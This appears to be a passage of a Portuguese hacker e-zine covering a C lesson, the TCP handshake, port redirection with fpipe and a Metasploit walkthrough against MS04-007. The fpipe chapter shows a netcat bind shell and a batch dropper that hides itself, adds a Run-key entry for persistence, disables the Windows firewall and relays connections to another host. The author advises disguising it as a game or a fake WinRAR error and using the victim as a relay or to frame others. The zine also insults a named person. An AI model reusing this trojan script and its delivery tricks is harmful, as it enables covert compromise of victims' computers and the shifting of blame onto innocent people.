printf ("Oi");     //Declarei a funçao printf, pois acima incluir a biblioteca stdio.h que contem esta funçao :0)
return (0);
}

Repara agora no "main", o main é a funçao principal do C, é abaixo dela que os codigos "começaram" a ser executados, nao importa o que tem pra traz ou mais para baixo, ele sempre vai começar a execuçao dos codigos abaixo desta funçao, que podera conter chamadas para outras funcoes. A funçao printf exibe coisas na tela, e como se fosse um echo em batch, no meu exemplo a "funçao" printf escreve a string Oi na tela.

Declarei a funcao main como inteira (int), ou seja, ela retorna uma inteiro [Nas proximas ediçoes falarei mais sobre return ;-)] e na lista de argumentos coloquei void, que significa vazio. Void e um tipo sem tipo, ele esta ali simplesmente para dizer que nao existem argumentos para a funcao main. O return (0) foi usado para fechar o programa. De uma olhada no code outra vez e rapare que os codigos em C sempre esta dentro de chaves, elas sao usadas para abrir "{"  e  fechar "}" o bloco de codigo, como no HTML e utilizada a tags de abertura <head> e as tags de fechamento </head>. Vamos ao exemplo do comando "for" agora.


                          ======================================
                               MAIL BOX NO MEIO NO CURSO DE C
                    
                            Entendeu a piada? Mail no meio hauhauHUhuh!!!
                          =======================================

Mau a zine começou a ja existem caras com duvidas eheh, mas voce deve estar se perguntando: Mas como se a zine começou agora? Simples, passei 2 meses anunciando que a zine ia sair, dae apareceu uma porrada de email dos caras ja com duvidas HuahuHauhUha!!! Nem um filho da puta quiz mandar materia, vao tomar no cu pessoal hauhuahua!!! Brincadeira, vamos a unica duvida que achei melhor responder na zine do que no MSN, porque tem tudo aver com o curso de C, mas normalmente nao respondo perguntas aqui, pois esta nao e a seçao que vou responder duvidas, vai ter uma mail box e tals, normalzinha e show de bola Huahauha!!!.

=======================================================================
Mail  <*****@bol.com.br>   

Ei cara, estou com um probleminha aqui. O negocio e o seguinte:

To desenvolvendo ai um code que ler string e grava em um arquivo, se voce nao entendeu eu quiz dizer CADASTRADOR DE CLIENTE, e que eu to afim de ganhar uma grana ae com o C tambem, vi que isso e possivel em um tutorial que achei na internet, mas to tendo problema aqui, pois nao consigo gravar o arquivo com a string, putz  grilo.....nem compilar eu to conseguindo, ei filho, se voce rir eu te mato, sabe que sou melhor que voce em Assembler, entao respeita ai os mais velhos pirralho hahahahahHauhuah. Sei mecher com ponteiro e o FILE, entao me poupe dos detalhes, Helpme, per favore velho, cê é muito foda entao ve se me ajuda ae.


RESPOSTA:

Ei tio, porque tu num mandou o code tb mula, como e que eu vou saber o que tu ta errando? Mas vamos la, deixa eu ver aqui, voce quer um cadastrador de cliente certo? e quer que os resultados sejam gravados no arquivo recem criado e pirralho e a mae!!!!! Vamos la, tenta isso ae, so que como putc obvio:

[Reposta para os leitores da minha zine]

#include <stdio.h>      
#include <stdlib.h>    

int main (void){
    int x;
    char vogais[100] = "AEIOU\n";
    printf ("As vogais sao:");
    for (x=0;vogais[x];x++){
    printf ("%c", vogais[x]);}
    system ("pause");
    return (0);}
   
Quando voce for usar o printf para exibir varios caracteres um a um na tela usando a funcao for, tu teras que lelos usando 
o leitor de caractere "%c"; Ja para escrever em arquivo tu teras que declarar a variavel que possui a string armazenada seguida do operador que executara a funcao "for" que nesse caso e o inteiro x*/ 

[Resposta para o tiozinho]

    FILE *pt;
    pt=fopen ("TIOZINHO.txt", "w");
    if (!pt){
    printf ("Nao conseguir escrever no arquivo TIOZINHO.txt\n");
    system ("pause");
    exit (0);}
    else {
    printf ("O arquivo TIOZINHO.txt foi aberto com sucesso...\n");
    Sleep (1000);
    system ("cls");
    printf ("Digite o nome do cliente:");
    scanf ("%s", cliente.nome);                         
    char clin[100];
    strcpy (clin, "Nome:");                               
    strcat (clin, cliente.nome);
    for (others.xXx=0; clin[others.xXx]; others.xXx++) putc (clin[others.xXx], pt);
    printf ("O cliente de %s %s foi cadastrado com sucesso no arquivo TIOZINHO.txt \n\a", clin, cliente.nome);
    system ("pause");
    fclose (pt);}}
    return (0);
}   

Ei TIOZINHO, espero que voce note que criei estruturas no meu code e por isso faço referencias a elas (so criei porque vou ensinar logo mais hauhauah!!!), Ei Ei Ei, facilitei a tua vida ae maluco, fiz o code imprimir no database uma string predefinida 

Nome:  

Dae tu faz as adapt pra tuas necessidades. Num esquece do header <string.h> porque se tu num bota pode esquecer do strcat e strcpy, espero ter ajudado e se mesmo assim tu num consegui te mando o teu cadastrador de cliente prontinho Huahuahauh!!!  20 minutos e faço um muito loco, so preciso adaptar o que eu fiz em perl para o C ehehhe.
                                
                 ----------------    END MAIL BOX --------------------

Para colocar comentarios no C utilize // para apenas uma linha de comentario ou /* para abrir um sequencia de comentarios, para fechar a segunda auternativa utilize */. Apareceu uma biblioteca nova na area e duas funçoes. Vamos falar primeiramente da biblioteca stdlib.h ou simplesmente standard library que significa em portuga: Biblioteca padrao. Quando voce inclui esta biblioteca no seu codigo significa que voce esta afim de incluir alguma funçao que existe dentro dela :-) eheh (so pra relembrar), ou seja, reparem ae na funçao system. A funçao system e uma funçao contida na biblioteca stalib.h e que possibilita que se execute comandos do proprio OS na execuçao do codigo, voce podera fazer com que os comandos do sistema interajam com seu programa, neste caso depois que meu pequeno programa exibe o alfabeto na tela ele ira exibir a mensagem Pressione qualquer tecla para continuar... e ira pausar a execução do code apos o termino da exibiçao das letrinhas mais manjadas do mundo (aeiou). O comando pause quando digitado no prompt do DOS exibe esta mensagem. 

Outra coisa que eu gostaria de lhes alertar:

Tome cuidado para nao esquecer de colocar o " ; " antes de declarar qualquer coisa, obvio que isso nao e regra, mas adiante voce entendera melhor. Reparem nesse trexos do code

     int x;
    char vogais[100] = "AEIOU\n";
    printf ("As vogais sao:");
    for (x=0;vogais[x];x++){
    printf ("%c", vogais[x]);}

Declarei uma variavel do tipo char que possue 99 caracteres de espaco em seu buffer, 99? Isso mesmo, 99, porque o indice no C começa em 0,  ou seja, se tivesse declarado uma variavel do tipo char com 10 de pilha, o 10 seria o 9. Tambem declarei a variavel x do tipo inteiro e utilizei o comando for para que continue a executar um bloco de codigo. Declarei que a variavel do tipo x possui um valor igual a 0 no for, depois declarei que a variavel que possue a string vai interagir com a execução do for, ou seja, posso escrever cada caractere contido na variavel vogais, pois estou utilizando o [x] que e o operador usado para continuar a execuçao dos comandos abaixo do for, e adicionei a variavel do tipo inteiro x dois sinais de mais "++" para ecrementar a operaçao, o ++ encrementa o valor da variavel cada vez que o looping e feito. 


ESTRUTURAS EM C

Para criar uma estrutura use o struct nome_da_estrutura, uma strutura nada mais e que uma variavel que agrupa varias outras de varios tipos em uma so, como no exemplo abaixo. 

#include <stdio.h>
#include <stdlib.h>

struct o_cara{
char nome[3];
int numero;
}david; //A variavel david do tipo struct possui esses campos acima

int main (){    //Vamos preencher os tais compos 
david.numero = 10; 
printf ("O numero %d", david.numero);
return (0);
}

Neste exemplo acima david e uma variavel do tipo estrutura que possue varios campos como o campo nome do tipo char e numero do tipo inteiro. Para fazer referencia a intens contidos dentro de uma estrutura basta utilizar:

variavel.campo_dentro_da_estrutura
david.numero.

O ponto "." e utilizado para fazer referencias a campos dentro de uma variavel do tipo struct, voce podera declarar varias variaveis do tipo struct e fazer referencia aos campos que as mesmas de certa forma "compartilham", assim:

#include <stdio.h>
#include <stdlib.h>

struct o_cara{
char nome[3];
int numero;
}david, grace; 
int main (){    
david.numero = 10; 
grace.numero = 55;
printf ("\nMeu numero favorito e o: %d\n\a", david.numero);
printf ("O numero favorito de minha namorada e: %d\n\n", grace.numero); 
system ("pause");
return (0);
}

Resultado:

Meu numero favorito e o:10
O numero favorito de minha namorada e o: 55

Pressione qualquer tecla para continuar..... 


Chegamos ao final da primeira parte do curso de C, espero que tenham gostado e se quiserem coisas mais mastigadas manda um email ae que farei questao de ajudar. Ate a aula numero dois galera....

----- C4p1Tul0 07

                                [+ ====================================== +] 
                                                Entendendo o Three Way Handshake 
                                                               6_Bl4ck9_f0x6       
                                [+ ====================================== +] 
        
Aprendi a pouco tempo e gostaria de ensinalos, ei ei ei, Cloudy, descobri que uma de suas fontes de estudo foi o livro universidade hacker ehehe, vi uma leve adaptaçao feita por voce tendo como base o exemplo do fabricio (me refiro a como se parece um ISN), eu dei uma melhorada neste texto, comparado ao que eu tinha postado no forum, e dei uma encrementadinha no final, em umas das flags citadas no forum. Galera.... esse capitulo ta show de bola!!!  

Three Way HandShake 

Quando uma maquina pretende se conectar a outra no TCP primeiramente ela faz um pedido de conexao sinalizando isso com o que nos chamamos de flag, que na mais e que um pacote que a mesma emite para o host remoto dizendo que deseja estabelecer uma conexao neste host em alguma porta que ele esteja escutando, o cliente emite o que nos chamamos de pacote de sincronismo, ou simplesmente SYN, que vem de synchronize (sincronizar). O pacote SYN e o primeiro passo para iniciar qualquer conexao por TCP, o cliente emite este pacote e aguarda uma resposta do host remoto. Pois bem, quando a maquina que solicitou a conexao (a maquina que emitiu o SYN) evia um pacote com uma flag de sincronismo, ela tera que esperar uma resposta do host remoto (obvio), esta resposta vem com um segundo pacote SYN e um outro pacote, mas so que dessa vez o pacote e o ACK, que vem de ACKnowledge, este pacote e emitido quando o servidor recebe o pacote com a flag SYN, pois ele tera que retornar uma resposta, ou seja, quando uma maquina emite este pacote ela esta dizendo que recebeu e aceitou o pacote anterior, isso funciona mais ou menos assim:

Cliente [Quero me conectar em uma porta sua!!! (SYN)] ------------------ > Host remoto (huuuum...)

Host remoto [Tudo bem, eu deixo!!! (SYN+ACK)] ----------------------- > Cliente (vixi!, ele deixou, hauhuah)

Cliente [Entao la vai!! (ACK)] --------------------------------------------- > Host remoto (empurrou com tudo huahua!!)

Sacou porque isso se chama "Three" Way Handshake? Simplesmente porque antes de qualquer conexao (aperto de maos) e necessario a negociaçao em tres vias. Quero passar um conhecimento mais profundo dos tres passos para voces estranhos e para o meu amorzinho que esta estudando informatica (minha mina), entao (para a felicidade de minha namorada :- ), maos a obra eheh.

ISN - Internet Sequencial Number (Se aprofundando mais no negocio)

Internet Sequencial Number ou simplesmente numero sequencial da internet, e como eu posso dizer... O que faz as coisas acontecerem no Handshake, isso mesmo, nao mencionei ele anteriormente, mas ele faz parte sim do negocio, siga essa ilustraçao abaixo.

Ilustraçao de uma conexao bem sucedida entre dois hosts

 

Hacker [SYN+ISN] --------------- > Alvo

Alvo [SYN+ACK+ISN] ---------- > Hacker

Hacker [ACK+ISN] -------------- > Alvo

Hum, esta ilustraçao acima ta muito fraca e nao mostra como as coisas funcionam na realidade, entao vamos deixar a proxima ilustraçao um pouco mais complexa, ou "aparentemente" mais complexa (apenas preste atencao).

Hacker [SYN, Seq= 785x 4fc0] -------------------------- > Alvo

Alvo [SYN, Seq= 786x 5gc0+ACK, Seq=785x 4fc0 +1] --------------- > Hacker

Hacker [ACK, Seq= 786x 5gc0 +1] ---------------------- > Alvo

Acima estou mostrando como realmente a coisa acontece. Primeiramente o Hacker que deseja se conectar em uma porta em escuta no alvo emite um pacote com a flag SYN mais um numero de sequencia, este numero (ISN), é quem vai auxiliar o alvo como guia para o mesmo saber quem ele vai responder e a quem ele vai pedir algum pacote caso o mesmo venha a atrazar no seu emcaminhamento. Pois bem, como voce pode ver acima, o hacker manda alem do syn uma sequencia igual a 785x 4fc0 para o alvo, o alvo recebe o syn com a sequencia que foi gerada pelo Hacker (785x 4fc0) e no caso de existir realmente uma porta em escuta, emite outro pacote com a flag syn com um ISN igual a 786x 5gc0 para o hacker (para sincronizar a conexao) e tambem manda um ACK com os mesmos numeros de sequencia enviado anteriormente (785x 4fc0) +1 para dizer que recebeu e aceitou o pacote anterirmente enviado (SYN). Repare na semelhança desses ISNs

Hacker   785x 4fc0           ------  785 4f  
Alvo       786x 5gc0          ------  786 5g  

Fiz esta ilustraçao apenas como exemplo, mas da pra entender bastante. Prestem atençao que alem do pacote ACK com a mesma sequencia gerada anteriormente  pelo Hacker e +1, o alvo emite um novo ISN com numeros sequenciais, dae o nome: Internet "Sequencial" number, reparou no sequencial? eheheh Quando o alvo emite um SYN com os numeros sequenciais do enviado pelo Hacker sigifica que ele está disposto a interagir, ou seja, quer proceguir com a conexao.

Logo após o recebimento do pacote SYN com a sequencia 786x 5gc0 gerada pelo alvo e o ACK com o mesmo numero de sequencia que tinha mandado anteriormente, a estaçao do hacker entao manda outro pacote com a flag ACK com os mesmos numeros de sequencia (786x 5gc0) enviados pelo host e +1 para dizer que ele recebeu o pacote anterior, agora sim o hacker podera estabelecer uma conexao com o alvo em uma porta qualquer que o mesmo venha a estar escutando.

Sabendo quando uma porta TCP está fechada

Como voce ja deve ter percebido, em uma conexao TCP quando uma porta esta aberta o host remoto emite um SYN+ACK como resposta a um pedido de conexao, mas como saber se uma porta TCP esta fechada? Simples, para sabermos distiguir apenas precisaremos conhecer a flag RST, que vem de RESET, assim bastaria testar as regras de saida do firewall para sabermos se uma determinada porta está ou não em escuta. A flag RST é emitida por um host como resposta a um TCP connect em uma porta que o mesmo nao esteja escutando, ou seja, a tal porta muito provavelmente está sendo filtrada por um firewall. Resumindo: Caso a porta esteja fechada o host manda um pacote ACK seguido do ISN emitido pelo cliente e +1 para dizer que recebeu o pacote anterior, e envia junto  com esse pacote o RST para resetar a conexao.

                                         Sabendo quando uma porta UDP está fechada
                           
              [Isso aqui não faz parte do handshake não, so escrevi para voce ter mais conhecimento]
 
O método de saber se uma porta UDP está em escuta ou não em um host remoto é um pouco diferente do usado pelo TCP, ou seja, ao invés de ser enviado um SYN e esperar um SYN/ACK para determinar a porta aberta e um ACK/RST para uma porta fechada, no UDP o cliente envia um pacote UDP para uma porta do host, se for emitido como resposta um pacote ICMP de porta inalcansável (unreachable), a porta está fechada, caso contrario, evidentemente ela estará aberta (listenning).

Vou dar uma encrementada ae "por cima" (como diz o cloudy) com outras flags que sao muito comuns:

Finish - FIN:  Finaliza uma conexão. Quando uma das estacoes emite um pacote com esta flag no final de uma transmissao TCP/IP (sempre no final, dã), significa que ela nao tem mais nada para ser enviado e está querendo encerrar a conexao, mas a estacao cliente ainda tem que esperar uma resposta do servidor para finalmente encerrar a conexao, pois o servidor pode pedir uma retransmissao dos dados caso algum pacote venha a chegar corrompido ate ele. Numa conexao TCP é muito comum um pedido de retransmissao, pois os pacotes pode ter sido corrompidos em algum momento no decorrer de seu trajeto pelos pontos de passagem (coisa que nao e muito dificio de acontecer). Se o servidor responder a um FIN com um ACK (Acknowledgement - "entendido") coisa que ele so fara quando receber todos os pacotes com seus devidos headers intactos, dae sim o cliente pode enviar o ultimo pacote de confirmaçao e acabar com a conversa eheh.  

                                         As outras duas flags vou deixar com voces,
                                vou passar a tarefa de pesquisar "afundo" sobre as mesmas,
                                     se quer moleza vai senter no pudim HuahuHuah!!!

Urgent - URG: Essa flag sinaliza "Urgência na conexão".

Push  -  PSH: Acelera a transmissão pra poder finaliza-la. Imagine o PSH como uma descarga de merda (quiz dizer agua na merda), e isso mesmo. A descarga enche de agua de uma hora pra outra o buraco do vaso, quando voce puxa a corda derrepente toda a merda vai pelo buraco da privada "que nao conheço o nome tecnico para esse troço", assim levando a merda embora para o reino encantado das merdas. Isso ocorreu porque eu dei velocidade a decida da agua que vai jogar a merda embora antes de mechela um pouquinho, sacou mano? 
                                                  

----- C4p1Tul0 08                                                                       
                               [+ ======================================== +] 
                              Tunelando conexões - Port redirect - Criando ponte para invasoes 
                                                               6_Bl4ck9_f0x6       
                                [+ ======================================= +]
                   
 
E ae galera da segurança, estou trazendo ae "pra quem ainda nao conhece" uma boa dica para facilitar a vidade de voces, pois as vezes voce precisa acessar recursos de uma maquina dentro de uma NAT, mas como os endereços IPs atribuidos as maquinas filtradas por NAT nao sao roteaveis voce e obrigado a hospedar os tais recursos na DMZ ou acessar as maquinas da NAT usando algum tipo de software de assitencia remota pela DMZ, eu mesmo quando trabalhava com vendas de acessorios de informatica tinha de depositar varias informaçoes com relaçao as minhas vendas em computadores de uma NAT, sendo assim precisei acessar maquinas em uma NAT por um host na DMZ e ter que transformar uma DMZ em workstation e muito mais demorado do que se voce acessase tais recursos diretamente do host. Mas esse negocio de criar ponte workstation ja esta ultrapassado, o tempo de ficar mapeando unidades de rede pela DMZ para depois acessalas ja se foi. Ao inves de voce usar uma ponte (WorkS) pela DMZ porque nao ser redirecionado automaticamente para uma NAT e trabalhar diretamente nela? É isso que eu vou demonstrar agora. Tunelar diretamente o NetBIOS tambem é bastante interesante mas nao vem ao caso agora, pois vou demonstrar um modo generico, vamos logo falar da tecnica que mais estudo na vida, lembrando que vou passar o basicao do tunelamento, pois se fosse falar detalhadamente deste assunto com toda certeza gastaria mais ou menos um dia "sem parar" escrevendo, o tunelamento nao se resume apenas nisto, gostaria que voces estudasem tambem para podermos aperfeiçoar a tecnica, gostaria muito de sua ajuda.

O programa que utilizarei e o fpipe para windows que e um programa bastante simples e vai ser mais facil demonstrar. Mas obvio que existem varios outro programas tao bons quanto o fpipe para ambientes Unix como o Corkscrew (saca-rolhas) que é uma ferramenta que tunela SSH para além e para aquém do proxy em HTTP. Os principais proxys que ele abre uma rota sao o Squid, Apache’s mod proxy e varios outros, mas vamos nos concentrar no fpipe.

Segue abaixo uma ajuda traduzida e adaptada por mim.

FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com/

FPipe [-hvu?] [-lrs <port>] [-i IP] IP

 -?/-h - Exibe este texto de ajuda
 -c     - Numero maximo de conexoes TCP permitidas. Padrao é 32
 -i      - Seta uma interface de rede (Redireciona pra qualquer seguimento)
 -l      - Escuta um numeo de porta
 -r     - Usado para designar uma porta em listenning no host remoto.
 -s     - outbound source port number
 -u     - Modo UDP
 -v     - verbose mode

Vamos la, este e o senario:

Local Machine <----------> FPipe server <---------> Remote machine
                Inbound                   Outbound
               connection                connection


Voce quer acessar uma maquina da NAT que tem o endereço IP 192.168.1.1 na porta TCP 666, então voce faz isso no host na DMZ:


C:\Documents and Settings\David>fpipe -l 289 -r 666 192.168.1.1 -vv
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com/

Listening for TCP connections on 0.0.0.0 port 289

Neste exemplo vou me conectar no meu proprio host utilizando uma porta que o netcat esta escutando. O procedimento e o normal viu galera, telnet 192.168.1.1 289 (meu host, "netcat"). Apos a conexao será exibido o seguinte:

Listening for TCP connections on 0.0.0.0 port 289

Connection accepted from 192.168.1.1 port 1121
Attempting to connect to 192.168.1.1 port 1121
Pipe connected:

In:      192.168.1.1:1121  --> 192.168.1.1:289
Out:      192.168.1.1:1122  --> 192.168.1.1:666
115 bytes received from outbound connection

E lá no netcat:
=====================================
Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\David>echo Olha o shell ae gente!!!
=====================================

Ou seja, shell do host da NAT. Analise as portas usadas com um netstat, no meu caso o resultado foi esse:

C:\Documents and Settings\David>netstat -an -p tcp | find "ESTABLISHED"

  TCP    192.168.1.1:289        192.168.1.1:1121       ESTABLISHED
  TCP    192.168.1.1:666        192.168.1.1:1122       ESTABLISHED
  TCP    192.168.1.1:1121       192.168.1.1:289        ESTABLISHED
  TCP    192.168.1.1:1122       192.168.1.1:666        ESTABLISHED

Veja outro exemplo:

C:\Documents and Settings\Administrador>fpipe -l 888 -vv -r 425 192.168.1.1
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com/

Listening for TCP connections on 0.0.0.0 port 888      //Esperando uma conexao TCP na porta 888
Connection accepted from 192.168.1.14 port 1087    //A Conexao do host 192.168.1.14 foi aceita na porta 1087
Attempting to connect to 192.168.1.14 port 1087
Pipe connected:
   In:     192.168.1.14:1087  --> 192.168.1.1:888        //O IP 192.168.1.14 acessou meu host na porta 888
  Out:      192.168.1.1:1165  --> 192.168.1.1:425     //Aqui ele foi redirecionado para a porta 425 do host 192.168.1.1
123 bytes received from outbound connection

Host 192.168.1.14:

=====================================
Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\David>echo Olha outro shell ae gente!!!
=====================================

Olha de quem que o netcat pega o IP:

C:\Documents and Settings\Administrador>nc -l -p 425 -vv -e cmd.exe
listening on [any] 425 ...
connect to [192.168.1.1] from Violator [192.168.1.1] 1165

Ou seja, o hacker se conectou na maquina que estava com o fpipe em escuta, e quando ele se conecta o netcat mostra que a conexao veio do PC que tava rodando o cano para a conexao e nao o IP do invasor (acredito que saber disso vai ser muito importante para voces :- ). Voce pode deixar algum script em batch compilado em aplicaçao fantasma no host do cara que sempre fique com uma porta em listening pelo fpipe e que te redirecione apos o acesso para um outro endereço IP quando voce se conectar nesta porta, voce pode ser redirecionado para outro host com o IP dele, tipo pra incriminar o cara,  ou para dar uma segunda camada de segurança ao invasor. Basta usar um binder e juntar o script com algum joguinho e mandar para o cara que voce vai usar de ponte. Ou mande apenas o script com fake msg do winrar, dizendo algo do tipo: arquivo corrompido. Voce pode ate mesmo compilar ele e manda ele purinho. O script que se incializa pode ser escrito mais ou menos assim:

<ponte.exe>

Rem -  Nao preciso de @echo off porque ele vai estar compilado em Ghost Application
copy ponte.exe c:\ /y    //Copia pro C: e substitui o arquivo ja existem sem perguntar
attrib +H c:\ponte.exe   //O attrib e o comando que define um atributo juntamente com os sinais + add - retirar 
reg add HKLM\software\microsoft\windows\currentversion\run /v ponte /t REG_SZ /d "c:\ponte.exe" /f  //add no registro 
net stop sharedaccess  //Desabilita o firewall do XP
fpipe -l 8080 -s 1162  -r 21 X.X.X.X       //Escuta na porta 8080, tenta abrir a porta 1162 que supostamente seria uma porta romdomica, pois o firewall deixa essas portas serem abertas sem alertar o usuario, porque essas portas normamente sao utilizadas quando voce abre o browser para acessar a internet, (quando essas tais portas se abrem a maioria dos firewalls as ignoram) e logo depois me redireciona para a porta 21 do host X.X.X.X, quando eu der um TCP Conect na porta 8080 eu sou redirecionado para o servidor de FTP do Host X.X.X.X e nao tenho o meu IP capturado, pois o IP que o host X.X.X.X vai logar e o do cara que to usando como ponte.

Voce ficara impressionado em saber o que o tunelamento e capaz de fazer juntamente com o netcat, tunelar com shell reverso é uma pratica bastante interesante. Gostaria que postasem ideias com relaçao ao netcat e ao tunelamento, pois o netcat tambem nao se resume em port scan, sniffer e essas babozeiras que ta todo mundo acostumado a ler por ai, espero que posam avançar nos estudos destas duas ferramentas e em proximos textos mostrarei as magicas que eu sou capaz de fazer com essas ferramentas, espero que tenham gostado do meu post e falow.

E como disse um "filho da puta frances" chamado "rog", o ssh tambem e interesante, porque com o ssh da para lançar o comando da ponte  no proprio pc cliente (tendo autorizaçao no pc ponte é claro) huahuahauhHuahu!!! Aquele trouxa.

Pra quem nao conhece o tal do rog, ele foi o cara que desenvolveu o cgi logger do Optix pro, ou seja, a parte mais tosca do trojan foi ele que desenvolveu, por isso ele se acha no direito de ficar falando merda pra todo mundo. Cara, te manca, tu nem "Brasileiro" é filho da puta, num te mete com brasileiro naum cara, gringo trouxa. Lammer é foda mesmo, o cara sai dizendo aos quatro cantos do mundo que fez o CGI logger do Optix, e depois posta em sites de segurança como remover o trojan. Voces ouviram o que eu disse? 

O cara ajuda os malucos a fazer e depois sair postando o "perigo" que o Optix representa. 

Filho da puta!!! Que cretino mais tosco meu irmao, esse seria o ultimo cara que me ajudaria no desenvolvimento de um trojan. Traira do caralho, e ainda e metido a mauricinho dizendo que fez dezenas de cursos superiores na franca e que ganha muito bem la fazendo so deus sabe o que com os computadores dos trouxas que o contratam. Esse sugeito nao sabe e de nada, convido todos voces a dar um pulinho no forum darkers e procurar um topico meu de nome:

Super especial: Metodos de prevençao e reçao a ataque do tipo D.D.O.S   

O sugeito so da rata vei, num sabe nem os termos corretos e quer ser o gostoso do darkers, so porque deram algumas estrelinhas de outro pra ele. A unica coisa que o infeliz manja e em PHP e CGI, e mesmo assim so desenvolve porcarias. 


----- C4p1Tul0 09

                              //--//--//--//--//--//--//  METASPLOIT //--//--//--//--//--//--// 
                    ||============#||O ABRIGO DOS EXPLOITS||#=================#|| 
                                                              6_BL4CK9_F0X6
 

Ao invés de você sair por ai procurando códigos de exploits para depois compilá-los, veja se ele não existe neste excelente repositório de exploits, me recuso a chamá-lo de scanner de vulnerabilidades, vale lembrar que os exploits normalmente são distribuídos em código fonte C ou Perl e para compilar a maioria deles você precisará ter um certo conhecimento em programação caso dê erro, mas fique tranqüilo, agora você não precisa se preocupar mais com isso quando for testar a segurança de sua rede, porque existe este excelente programa que faz tudo isso pra você e ainda por cima possui uma GUI  e também possui um console pra quem gostar do lado obscuro por assim dizer dos programas (que e o que vamos utilizar), estou me referindo ao Metasploit Frameork, atualmente na versão 3.0, para usá-lo em sua forma mais simples basta colocar o IP do alvo e clicar em Launch Exploit  e esperar o Shell, simples não acha? Agora vou demonstrar como essa fantástica ferramenta funciona para você checar a segurança de sua rede com todo o conforto que o metasploit pode lhe proporcionar, sem contar que o mesmo ainda disponibiliza varias otras subferramentas como farejadores de rede, etc. Vou utilizar a versao 2.7 do metasploit para Unix, mas tambem existem versoes dele para windows.  Passei o nessus em um host na minha rede e o mesmo me forneceu um relatorio com diversas falhas neste host, dei uma picotada no log que o nessus gerou  e extrai apenas a vulnerabilidade que iremos explorar, analise e veja o que a falha possibilita a um invasor:

Synopsis :

Arbitrary code can be executed on the remote host.
Description :

The remote Windows host has a ASN.1 library which is vulnerable to a 
flaw which could allow an attacker to execute arbitrary code on this host.

To exploit this flaw, an attacker would need to send a specially crafted
ASN.1 encoded packet with improperly advertised lengths.

This particular check sent a malformed NTLM packet and determined that 
the remote host is not patched.
Solution:

http://www.microsoft.com/technet/security/bulletin/ms04-007.mspx
Risk Factor :

Critical / CVSS Base Score : 10 
(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N)
CVE : CVE-2003-0818
BID : 9633, 9635, 9743, 13300
Other references : IAVA:2004-A-0001
Plugin ID : 12054
 
Repare na linha: Arbitrary code can be executed on the remote host

Vamos agora botar a mao na massa e colocar o metasploit pra trabalhar, primeiramente entre no diretorio do metasploit com o comando cd diretorio (dã), agora vamos compilar o console que esta escrito em perl, ou seja: perl msfconsole, apos isso voce terá o seguinte resultado:

Black_Fox@BlackMachine:~/Desktop/temp/framework-2.7$ perl msfconsole
Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)


                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf >

Este é o shell do metasploit, agora vamos mecher um pouco nele. As traduções abaixo foram feitas por mim, por isso pode confiar hauhauhauah!!!. Digite help para obter uma lista com os comandos disponiveis, originalmente você terá uma descrição em ingles de comando comando, mas como eu já avia falado anteriormente, eu traduzi e fiz algumas adaptações no texto.

msf > help

Metasploit Framework Main Console Help
======================================

        ?            Exibe esta lista de comandos 
        cd           Muda o diretorio de trabalho
        exit         Sai do console do metasploit
        help         Exibe esta lista de comandos
        info         Exibe detalhes do exploit ou informações do payload
        quit         Sai do console do metasploit
        reload       Recarrega exploits e payloads
        save         Salva as configurações no disco
        setg         Seleciona uma variavel de ambiente global
        show         Exibe exploits e payloads disponiveis
        unsetg       Remove uma variavel de ambiente global 
        use          Seleciona o exploit pelo nome 
        version      Exibe a versão do console 


Para ver os exploits disponiveis digite 'show exploits' 

msf > show exploits 

                             [Editei a lista, pois sao muuuuuuuitos exploits]

3com_3cdaemon_ftp_overflow     3Com 3CDaemon FTP Server Overflow
  Credits                        Metasploit Framework Credits
  afp_loginext                   AppleFileServer LoginExt PathName Overflow
  aim_goaway                     AOL Instant Messenger goaway Overflow
  altn_webadmin                  Alt-N WebAdmin USER Buffer Overflow
  apache_chunked_win32           Apache Win32 Chunked Encoding
  arkeia_agent_access            Arkeia Backup Client Remote Access
  arkeia_type77_macos            Arkeia Backup Client Type 77 Overflow (Mac OS X)
  arkeia_type77_win32            Arkeia Backup Client Type 77 Overflow (Win32)
  awstats_configdir_exec         AWStats configdir Remote Command Execution
  backupexec_agent               Veritas Backup Exec Windows Remote Agent Overflow
  backupexec_dump                Veritas Backup Exec Windows Remote File Access
  backupexec_ns                  Veritas Backup Exec Name Service Overflow
  backupexec_registry            Veritas Backup Exec Server Registry Access
  badblue_ext_overflow           BadBlue 2.5 EXT.dll Buffer Overflow
  bakbone_netvault_heap          BakBone NetVault Remote Heap Overflow
  barracuda_img_exec             Barracuda IMG.PL Remote Command Execution
  blackice_pam_icq               ISS PAM.dll ICQ Parser Buffer Overflow
  bluecoat_winproxy              Blue Coat Systems WinProxy Host Header Buffer Overflow
  msasn1_ms04_007_killbill       Microsoft ASN.1 Library Bitstring Heap Overflow

Vou setar o exploit que exploita falha no host remoto, ou seja:

Nome interno do exploit        Nome externo 

msasn1_ms04_007_killbill       Microsoft ASN.1 Library Bitstring Heap Overflow

Para selecionarmos este exploit digite:

msf > use  msasn1_ms04_007_killbill   //Enter 
msf msasn1_ms04_007_killbill >       //Exploit setado 

Agora vamos ver mais ajudas com relação a comandos do metasploit, pois quando estamos com um exploit setado a ajuda muda um pouco de figura, vamos ver o que vai aparecer de novo:

Metasploit Framework Exploit Console Help
======================================
                    
        ?             Exibe esta lista de comandos
        back          Drop back to the main menu
        cd            Muda o diretorio de trabalho
        check         Perform vulnerability check
        exit          Sai do console 
        exploit       Executa o exploit atual 
        help          Exibe esta lista de comandos
        info          Exibe detalhes do exploit ou informações do payload
        quit          Sai do console 
        rcheck        Perform vulnerability check
        reload        Recarrega exploits e payloads
        rexploit      Reload and exploit, for us tester types
        save          Save configuration to disk
